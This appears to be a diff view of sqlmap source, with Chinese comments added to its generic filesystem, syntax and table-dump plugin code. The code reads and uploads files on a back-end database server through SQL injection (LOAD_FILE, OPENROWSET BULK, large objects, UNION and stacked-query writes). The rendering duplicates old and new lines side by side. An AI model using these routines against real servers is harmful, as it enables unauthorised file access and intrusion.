# 15. 初始化一个空列表 dumpFromTbls用于存储用户选择要转储的表
dumpFromTbls = [] dumpFromTbls = []
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) # 16. 构建一个消息,用于提示用户选择当前数据库下要转储的表
message += "[a]ll (default)\n" message = "which table(s) of database '%s'?\
" % unsafeSQLIdentificatorNaming(db)
# 17. 在消息中添加一个选项 [a]ll (default),表示默认选择全部表
message += "[a]ll (default)\
"
# 18. 遍历当前数据库下的表列表,将表名添加到消息中,并进行安全 SQL 标识符命名处理
for tbl in tablesList: for tbl in tablesList:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) message += "[%s]\
" % unsafeSQLIdentificatorNaming(tbl)
message += "[s]kip\n" # 19. 在消息中添加一个选项 [s]kip允许用户跳过当前数据库的表
message += "[s]kip\
"
# 20. 在消息中添加一个选项 [q]uit允许用户退出
message += "[q]uit" message += "[q]uit"
# 21. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部表
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 22. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有表添加到 dumpFromTbls 列表中
if not choice or choice.lower() == 'a': if not choice or choice.lower() == 'a':
dumpFromTbls = tablesList dumpFromTbls = tablesList
# 23. 如果用户输入为 's' (或 'S'),则跳过当前数据库的表,继续处理下一个数据库
elif choice.lower() == 's': elif choice.lower() == 's':
continue continue
# 24. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q': elif choice.lower() == 'q':
return return
# 25. 否则,将用户输入的表名按逗号分割,并添加到 dumpFromTbls 列表中
else: else:
dumpFromTbls = choice.replace(" ", "").split(',') dumpFromTbls = choice.replace(" ", "").split(',')
# 26. 遍历 dumpFromTbls 列表,该列表存储当前数据库下要转储的表名
for table in dumpFromTbls: for table in dumpFromTbls:
# 27. 将当前表名赋值给 conf.tbl (全局配置参数)
conf.tbl = table conf.tbl = table
# 28. 清空 kb.data.cachedColumns (全局配置参数) 缓存的列信息
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
# 29. 清空 kb.data.dumpedTable (全局配置参数) 缓存的表数据
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
# 30. 调用 self.dumpTable() 函数,转储当前表的数据
data = self.dumpTable() data = self.dumpTable()
# 31. 如果转储成功 (data 不为空),则将转储的数据传递给 conf.dumper.dbTableValues() 函数进行后续处理
if data: if data:
conf.dumper.dbTableValues(data) conf.dumper.dbTableValues(data)

522
src/sqlmap-master/plugins/generic/filesystem.py
Unescape View File

@ -5,320 +5,496 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import codecs import codecs # 用于处理不同编码的文本
import os import os # 用于与操作系统进行交互
import sys import sys # 用于访问与系统相关的参数和函数
from lib.core.agent import agent from lib.core.agent import agent # 导入 agent 模块,用于与数据库进行交互
from lib.core.common import Backend from lib.core.common import Backend # 导入 Backend 模块,用于获取数据库信息
from lib.core.common import checkFile from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import dataToOutFile from lib.core.common import dataToOutFile # 导入 dataToOutFile 函数,用于将数据写入文件
from lib.core.common import decloakToTemp from lib.core.common import decloakToTemp # 导入 decloakToTemp 函数,用于将伪装的文件名转换为临时文件路径
from lib.core.common import decodeDbmsHexValue from lib.core.common import decodeDbmsHexValue # 导入 decodeDbmsHexValue 函数,用于解码数据库的十六进制数据
from lib.core.common import isListLike from lib.core.common import isListLike # 导入 isListLike 函数,用于检查是否为列表类型
from lib.core.common import isNumPosStrValue from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查是否为正数字符串
from lib.core.common import isStackingAvailable from lib.core.common import isStackingAvailable # 导入 isStackingAvailable 函数,用于检查是否支持堆叠查询
from lib.core.common import isTechniqueAvailable from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查是否支持某种注入技术
from lib.core.common import readInput from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.compat import xrange from lib.core.compat import xrange # 导入 xrange 函数,用于生成数字序列
from lib.core.convert import encodeBase64 from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于进行 Base64 编码
from lib.core.convert import encodeHex from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于进行十六进制编码
from lib.core.convert import getText from lib.core.convert import getText # 导入 getText 函数,用于将数据转换为文本
from lib.core.convert import getUnicode from lib.core.convert import getUnicode # 导入 getUnicode 函数,用于将数据转换为 Unicode
from lib.core.data import conf from lib.core.data import conf # 导入 conf 模块,用于获取全局配置信息
from lib.core.data import kb from lib.core.data import kb # 导入 kb 模块,用于获取全局知识库信息
from lib.core.data import logger from lib.core.data import logger # 导入 logger 模块,用于打印日志信息
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,用于指定字符集类型
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入 DBMS 枚举,用于指定数据库类型
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,用于指定预期的数据类型
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,用于指定攻击载荷类型
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入 SqlmapUndefinedMethod 异常,用于处理未定义的方法
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING # 导入 UNICODE_ENCODING 变量,用于指定 Unicode 编码
from lib.request import inject from lib.request import inject # 导入 inject 模块,用于进行 SQL 注入
class Filesystem(object): class Filesystem(object):
""" """
This class defines generic OS file system functionalities for plugins. 这个类定义了插件的通用操作系统文件系统功能
""" """
def __init__(self): def __init__(self):
self.fileTblName = "%sfile" % conf.tablePrefix # 初始化文件表名
self.tblField = "data" self.fileTblName = "%sfile" % conf.tablePrefix # 将配置中的表前缀与 "file" 组合,生成表名
# 初始化表字段名
self.tblField = "data" # 设置表字段名为 "data"
def _checkFileLength(self, localFile, remoteFile, fileRead=False): def _checkFileLength(self, localFile, remoteFile, fileRead=False):
"""
检查本地文件和远程文件长度是否相同
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileRead (bool, optional): 是否为读取文件操作. Defaults to False.
Returns:
bool: 如果文件长度相同返回 True否则返回 False如果无法判断则返回 None
"""
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile # 如果是 MySQL 数据库
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile # 构建获取远程文件长度的 SQL 查询
elif Backend.isDbms(DBMS.PGSQL) and not fileRead: elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid # 如果是 PostgreSQL 数据库且不是读取文件操作
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid # 构建获取大对象长度的 SQL 查询
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") # 如果是 MSSQL 数据库
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") # 创建支持表
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) # 使用 OPENROWSET 将文件内容插入表中
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) # 构建获取表数据长度的 SQL 查询
try: try:
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile) # 获取本地文件大小
except OSError: except OSError:
warnMsg = "file '%s' is missing" % localFile # 如果本地文件不存在
logger.warning(warnMsg) warnMsg = "file '%s' is missing" % localFile # 构造警告消息
localFileSize = 0 logger.warning(warnMsg) # 打印警告信息
localFileSize = 0 # 将本地文件大小设置为 0
if fileRead and Backend.isDbms(DBMS.PGSQL): if fileRead and Backend.isDbms(DBMS.PGSQL):
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) # 如果是读取文件操作且是 PostgreSQL 数据库
sameFile = True logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) # 打印信息,表示 PostgreSQL 无法检查读取文件长度
sameFile = True # 将 sameFile 设置为 True
else: else:
logger.debug("checking the length of the remote file '%s'" % remoteFile) # 如果不是读取文件或者不是 PostgreSQL 数据库
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) logger.debug("checking the length of the remote file '%s'" % remoteFile) # 打印调试信息,表示正在检查远程文件长度
sameFile = None remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取远程文件大小
sameFile = None # 将 sameFile 初始化为 None
if isNumPosStrValue(remoteFileSize): if isNumPosStrValue(remoteFileSize):
remoteFileSize = int(remoteFileSize) # 如果远程文件大小为有效的数字字符串
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) remoteFileSize = int(remoteFileSize) # 将远程文件大小转换为整数
sameFile = False localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) # 将本地文件路径转换为 Unicode
sameFile = False # 将 sameFile 设置为 False
if localFileSize == remoteFileSize: if localFileSize == remoteFileSize:
sameFile = True # 如果本地文件大小和远程文件大小相同
infoMsg = "the local file '%s' and the remote file " % localFile sameFile = True # 将 sameFile 设置为 True
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) infoMsg = "the local file '%s' and the remote file " % localFile # 构造信息消息
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) # 将远程文件路径和文件大小添加到信息消息中
elif remoteFileSize > localFileSize: elif remoteFileSize > localFileSize:
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) # 如果远程文件大小大于本地文件大小
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
else: else:
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) # 如果远程文件大小小于本地文件大小
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
logger.info(infoMsg) logger.info(infoMsg) # 打印信息消息
else: else:
sameFile = False # 如果远程文件大小不是有效的数字字符串
warnMsg = "it looks like the file has not been written (usually " sameFile = False # 将 sameFile 设置为 False
warnMsg += "occurs if the DBMS process user has no write " warnMsg = "it looks like the file has not been written (usually " # 构造警告消息
warnMsg += "privileges in the destination path)" warnMsg += "occurs if the DBMS process user has no write " # 警告消息补充
logger.warning(warnMsg) warnMsg += "privileges in the destination path)" # 警告消息补充
logger.warning(warnMsg) # 打印警告消息
return sameFile return sameFile # 返回文件长度检查结果
def fileToSqlQueries(self, fcEncodedList): def fileToSqlQueries(self, fcEncodedList):
""" """
Called by MySQL and PostgreSQL plugins to write a file on the 将编码后的文件内容转换为 SQL 查询语句用于 MySQL PostgreSQL
back-end DBMS underlying file system
""" Args:
fcEncodedList (list): 编码后的文件内容列表
counter = 0 Returns:
sqlQueries = [] list: SQL 查询语句列表
"""
counter = 0 # 初始化计数器
sqlQueries = [] # 初始化 SQL 查询语句列表
for fcEncodedLine in fcEncodedList: for fcEncodedLine in fcEncodedList: # 遍历编码后的文件内容列表
if counter == 0: if counter == 0:
# 如果是第一个编码行
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine)) sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
# 将带有编码数据的插入语句添加到 SQL 查询列表中
else: else:
# 如果不是第一个编码行
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine) updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
# 构建更新语句,将编码行添加到数据字段中
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField)) sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
# 将更新语句添加到 SQL 查询列表中
counter += 1 counter += 1 # 计数器加 1
return sqlQueries return sqlQueries # 返回 SQL 查询语句列表
def fileEncode(self, fileName, encoding, single, chunkSize=256): def fileEncode(self, fileName, encoding, single, chunkSize=256):
""" """
Called by MySQL and PostgreSQL plugins to write a file on the 读取文件内容并进行编码
back-end DBMS underlying file system
""" Args:
fileName (str): 文件路径
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
checkFile(fileName) Returns:
list: 编码后的文件内容列表
"""
checkFile(fileName) # 检查文件是否存在
with open(fileName, "rb") as f: with open(fileName, "rb") as f:
content = f.read() # 打开文件进行读取
content = f.read() # 读取文件内容
return self.fileContentEncode(content, encoding, single, chunkSize) return self.fileContentEncode(content, encoding, single, chunkSize) # 返回编码后的文件内容
def fileContentEncode(self, content, encoding, single, chunkSize=256): def fileContentEncode(self, content, encoding, single, chunkSize=256):
retVal = [] """
对文件内容进行编码
Args:
content (bytes): 文件内容
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
Returns:
list: 编码后的文件内容列表
"""
retVal = [] # 初始化返回列表
if encoding == "hex": if encoding == "hex":
content = encodeHex(content) # 如果编码方式为 "hex"
content = encodeHex(content) # 将文件内容进行十六进制编码
elif encoding == "base64": elif encoding == "base64":
content = encodeBase64(content) # 如果编码方式为 "base64"
content = encodeBase64(content) # 将文件内容进行 Base64 编码
else: else:
content = codecs.encode(content, encoding) # 如果编码方式不是 "hex" 或 "base64"
content = codecs.encode(content, encoding) # 使用指定的编码方式进行编码
content = getText(content).replace("\n", "") content = getText(content).replace("\
", "") # 将编码后的内容转换为文本,并删除换行符
if not single: if not single:
# 如果不是单行编码
if len(content) > chunkSize: if len(content) > chunkSize:
# 如果内容长度大于分块大小
for i in xrange(0, len(content), chunkSize): for i in xrange(0, len(content), chunkSize):
_ = content[i:i + chunkSize] # 按照分块大小进行分块
_ = content[i:i + chunkSize] # 获取当前分块
if encoding == "hex": if encoding == "hex":
_ = "0x%s" % _ # 如果编码方式为 "hex"
_ = "0x%s" % _ # 添加十六进制前缀
elif encoding == "base64": elif encoding == "base64":
_ = "'%s'" % _ # 如果编码方式为 "base64"
_ = "'%s'" % _ # 添加单引号
retVal.append(_) retVal.append(_) # 将当前分块添加到返回列表中
if not retVal: if not retVal:
# 如果返回列表为空
if encoding == "hex": if encoding == "hex":
content = "0x%s" % content # 如果编码方式为 "hex"
content = "0x%s" % content # 添加十六进制前缀
elif encoding == "base64": elif encoding == "base64":
content = "'%s'" % content # 如果编码方式为 "base64"
content = "'%s'" % content # 添加单引号
retVal = [content] retVal = [content] # 将编码后的内容添加到返回列表中
return retVal return retVal # 返回编码后的文件内容列表
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
choice = None """
询问用户是否需要检查写入的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Returns:
bool: 如果文件写入成功返回 True如果用户选择不检查返回 True否则返回 False
"""
choice = None # 初始化用户选择
if forceCheck is not True: if forceCheck is not True:
message = "do you want confirmation that the local file '%s' " % localFile # 如果不强制检查
message += "has been successfully written on the back-end DBMS " message = "do you want confirmation that the local file '%s' " % localFile # 构造询问消息
message += "file system ('%s')? [Y/n] " % remoteFile message += "has been successfully written on the back-end DBMS " # 消息补充
choice = readInput(message, default='Y', boolean=True) message += "file system ('%s')? [Y/n] " % remoteFile # 消息补充
choice = readInput(message, default='Y', boolean=True) # 读取用户输入
if forceCheck or choice: if forceCheck or choice:
return self._checkFileLength(localFile, remoteFile) # 如果强制检查或者用户选择检查
return self._checkFileLength(localFile, remoteFile) # 调用检查文件长度函数
return True return True # 如果用户选择不检查,则返回 True
def askCheckReadFile(self, localFile, remoteFile): def askCheckReadFile(self, localFile, remoteFile):
"""
询问用户是否需要检查读取的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
Returns:
bool: 如果文件读取成功返回 True如果用户选择不检查返回 None
"""
if not kb.bruteMode: if not kb.bruteMode:
message = "do you want confirmation that the remote file '%s' " % remoteFile # 如果不是爆破模式
message += "has been successfully downloaded from the back-end " message = "do you want confirmation that the remote file '%s' " % remoteFile # 构造询问消息
message += "DBMS file system? [Y/n] " message += "has been successfully downloaded from the back-end " # 消息补充
message += "DBMS file system? [Y/n] " # 消息补充
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True):
return self._checkFileLength(localFile, remoteFile, True) # 读取用户输入
return self._checkFileLength(localFile, remoteFile, True) # 如果用户选择检查,调用检查文件长度函数
return None return None # 如果用户选择不检查,则返回 None
def nonStackedReadFile(self, remoteFile): def nonStackedReadFile(self, remoteFile):
errMsg = "'nonStackedReadFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用非堆叠查询技术读取远程文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'nonStackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
errMsg = "'stackedReadFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用堆叠查询技术读取远程文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "'unionWriteFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用 UNION 查询技术写入文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'unionWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "'stackedWriteFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用堆叠查询技术写入文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def readFile(self, remoteFile): def readFile(self, remoteFile):
localFilePaths = [] """
读取远程文件
Args:
remoteFile (str): 远程文件路径
Returns:
list: 本地文件路径列表
"""
localFilePaths = [] # 初始化本地文件路径列表
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库类型和操作系统类型
for remoteFile in remoteFile.split(','): for remoteFile in remoteFile.split(','):
fileContent = None # 遍历所有远程文件路径
kb.fileReadMode = True fileContent = None # 初始化文件内容
kb.fileReadMode = True # 设置文件读取模式为 True
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
# 如果使用直接连接或支持堆叠查询
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to try to read the file with stacked query SQL " # 如果支持堆叠查询
debugMsg += "injection technique" debugMsg = "going to try to read the file with stacked query SQL " # 构造调试消息
logger.debug(debugMsg) debugMsg += "injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
fileContent = self.stackedReadFile(remoteFile) fileContent = self.stackedReadFile(remoteFile) # 使用堆叠查询技术读取文件
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to try to read the file with non-stacked query " # 如果是 MySQL 数据库
debugMsg += "SQL injection technique" debugMsg = "going to try to read the file with non-stacked query " # 构造调试消息
logger.debug(debugMsg) debugMsg += "SQL injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
fileContent = self.nonStackedReadFile(remoteFile) fileContent = self.nonStackedReadFile(remoteFile) # 使用非堆叠查询技术读取文件
else: else:
errMsg = "none of the SQL injection techniques detected can " # 如果无法使用以上技术读取文件
errMsg += "be used to read files from the underlying file " errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "system of the back-end %s server" % Backend.getDbms() errMsg += "be used to read files from the underlying file " # 错误消息补充
logger.error(errMsg) errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
fileContent = None fileContent = None # 将文件内容设置为 None
kb.fileReadMode = False kb.fileReadMode = False # 设置文件读取模式为 False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True) # 如果文件内容为空并且不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
elif isListLike(fileContent): elif isListLike(fileContent):
newFileContent = "" # 如果文件内容是一个列表
newFileContent = "" # 初始化新的文件内容
for chunk in fileContent: for chunk in fileContent:
# 遍历文件内容中的块
if isListLike(chunk): if isListLike(chunk):
# 如果块本身是一个列表
if len(chunk) > 0: if len(chunk) > 0:
chunk = chunk[0] # 如果块列表不为空
chunk = chunk[0] # 获取块列表的第一个元素
else: else:
chunk = "" # 如果块列表为空
chunk = "" # 将块设置为空字符串
if chunk: if chunk:
newFileContent += chunk # 如果块不为空
newFileContent += chunk # 将块添加到新的文件内容中
fileContent = newFileContent fileContent = newFileContent # 将新的文件内容赋值给 fileContent
if fileContent is not None: if fileContent is not None:
fileContent = decodeDbmsHexValue(fileContent, True) # 如果文件内容不为空
fileContent = decodeDbmsHexValue(fileContent, True) # 解码文件内容
if fileContent.strip(): if fileContent.strip():
localFilePath = dataToOutFile(remoteFile, fileContent) # 如果文件内容不为空
localFilePath = dataToOutFile(remoteFile, fileContent) # 将文件内容写入本地文件
if not Backend.isDbms(DBMS.PGSQL): if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True) # 如果不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
sameFile = self.askCheckReadFile(localFilePath, remoteFile) sameFile = self.askCheckReadFile(localFilePath, remoteFile) # 询问用户是否需要检查读取的文件
if sameFile is True: if sameFile is True:
localFilePath += " (same file)" # 如果文件相同
localFilePath += " (same file)" # 添加 (same file) 后缀
elif sameFile is False: elif sameFile is False:
localFilePath += " (size differs from remote file)" # 如果文件大小不同
localFilePath += " (size differs from remote file)" # 添加 (size differs from remote file) 后缀
localFilePaths.append(localFilePath) localFilePaths.append(localFilePath) # 将本地文件路径添加到列表中
elif not kb.bruteMode: elif not kb.bruteMode:
errMsg = "no data retrieved" # 如果文件内容为空并且不是爆破模式
logger.error(errMsg) errMsg = "no data retrieved" # 构造错误消息
logger.error(errMsg) # 打印错误消息
return localFilePaths return localFilePaths # 返回本地文件路径列表
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
written = False """
写入本地文件到远程服务器
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str, optional): 文件类型. Defaults to None.
forceCheck (bool, optional): 是否强制检查文件长度. Defaults to False.
Returns:
bool: 如果文件写入成功则返回 True否则返回 False
"""
written = False # 初始化写入状态
checkFile(localFile) checkFile(localFile) # 检查本地文件是否存在
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库类型和操作系统类型
if localFile.endswith('_'): if localFile.endswith('_'):
localFile = getUnicode(decloakToTemp(localFile)) # 如果本地文件名以 '_' 结尾
localFile = getUnicode(decloakToTemp(localFile)) # 将伪装的文件名转换为临时文件路径
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
# 如果使用直接连接或者支持堆叠查询技术
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to upload the file '%s' with " % fileType # 如果支持堆叠查询技术
debugMsg += "stacked query technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试消息
logger.debug(debugMsg) debugMsg += "stacked query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用堆叠查询技术写入文件
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True) # 清理临时表
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType # 如果支持 UNION 查询技术并且是 MySQL 数据库
debugMsg += "UNION query technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
logger.debug(debugMsg) debugMsg += "UNION query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 UNION 查询技术写入文件
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType # 如果是 MySQL 数据库
debugMsg += "LINES TERMINATED BY technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
logger.debug(debugMsg) debugMsg += "LINES TERMINATED BY technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 LINES TERMINATED BY 技术写入文件
else: else:
errMsg = "none of the SQL injection techniques detected can " # 如果以上技术都无法使用
errMsg += "be used to write files to the underlying file " errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "system of the back-end %s server" % Backend.getDbms() errMsg += "be used to write files to the underlying file " # 错误消息补充
logger.error(errMsg) errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
return None return None # 返回 None
return written return written # 返回写入状态

718
src/sqlmap-master/plugins/generic/search.py
View File

File diff suppressed because it is too large Load Diff

71
src/sqlmap-master/plugins/generic/syntax.py
Unescape View File

@ -5,46 +5,71 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re import re # 导入re模块用于正则表达式操作
from lib.core.common import Backend from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.convert import getBytes from lib.core.convert import getBytes # 导入getBytes函数用于将字符串转换为字节
from lib.core.data import conf from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
class Syntax(object): class Syntax(object):
""" """
This class defines generic syntax functionalities for plugins. This class defines generic syntax functionalities for plugins.
这个类定义了插件的通用语法功能
""" """
def __init__(self): def __init__(self):
pass pass # 初始化方法,此处为空
@staticmethod @staticmethod
def _escape(expression, quote=True, escaper=None): def _escape(expression, quote=True, escaper=None):
retVal = expression """
Internal method to escape a given expression.
内部方法用于转义给定的表达式
if quote: Args:
for item in re.findall(r"'[^']*'+", expression): expression (str): The expression to escape. 要转义的表达式
original = item[1:-1] quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
if original: escaper (function, optional): The function to use for escaping. 用于转义的函数默认为None
